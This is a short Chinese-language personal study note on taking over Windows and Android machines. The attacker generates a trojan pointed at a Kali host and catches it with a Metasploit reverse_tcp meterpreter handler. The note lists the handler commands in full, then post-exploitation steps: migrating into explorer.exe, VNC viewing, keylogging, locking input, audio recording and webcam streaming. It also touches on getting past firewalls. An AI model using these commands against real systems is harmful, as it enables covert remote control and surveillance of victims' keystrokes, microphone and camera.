windows :根据自己的kali IP 生成木马
注意shell > shell.exe之间是有空格的,LHOST是kali 本机的IP ,LPORT是自定义设置的端口,据说高端口比较好过防火墙,(但是我实验的时候感觉差不多,基于win10 的实验,防火墙需要全关了,不然木马文件根本过不去)
生成木马后的文件在本机的主目录下。
生成木马后,要把木马拖到要攻击的目标主机下
打开metasploit,进行攻击
打开metasploit :msfconsole
调用模块:use exploit/multi/handler
调用payload :set payload windows/meterpreter/reverse_tcp
显示选项;show options
参数设置:set LHOST (KALI本机的的IP)
set LPORT (端口设置与前面的木马端口要一致)
确认设置是否设置成功:show options
运行:exploit(进行等待,只要目标主机打开了木马文件,便能扫描到,测试的要人工去打开了,在android上的则要进行安装)
结果:
这里显示有一台机器正在运行本机的木马,说明已经拿到了控制权,可以使用help查看命令。
进程注入
因为木马可能随时会被关掉,所以拿到控制权后,要第一时间进行进程注入。
查看进程列表:ps
找到相应的进程:explorer.exe .并记下pid (Windows程序管理器或者文件资源管理器,它用于管理Windows图形壳,包括桌面和文件管理,删除该程序会导致Windows图形界面无法使用)
进行注入:magtate 4560
注入成功。
远程桌面查看:run vnc
键盘监控:keyscan_start
keyscan_dump
keyscan_stop
键盘鼠标锁定:uictl disable keyboard
uictl enable keyboard(mouse/all)
录音:record -d 10 (10是十秒的意思,生成的音频是wav格式的,找一个播放器就可以播放)
打开机器的网络摄像头:webcam_stream
ctrl + C 退出当前操作
exit 退出程序
Android 入侵:
步骤跟入侵windows是一样的,就只是有一些命令要改成android,如木马生成的命令中的windows 要改成android,shell > shell.exe要改成 apk > apk.apk .调用payload中的windows也是改成android。
个人感觉android入侵要比windows要简单。
个人学习笔记。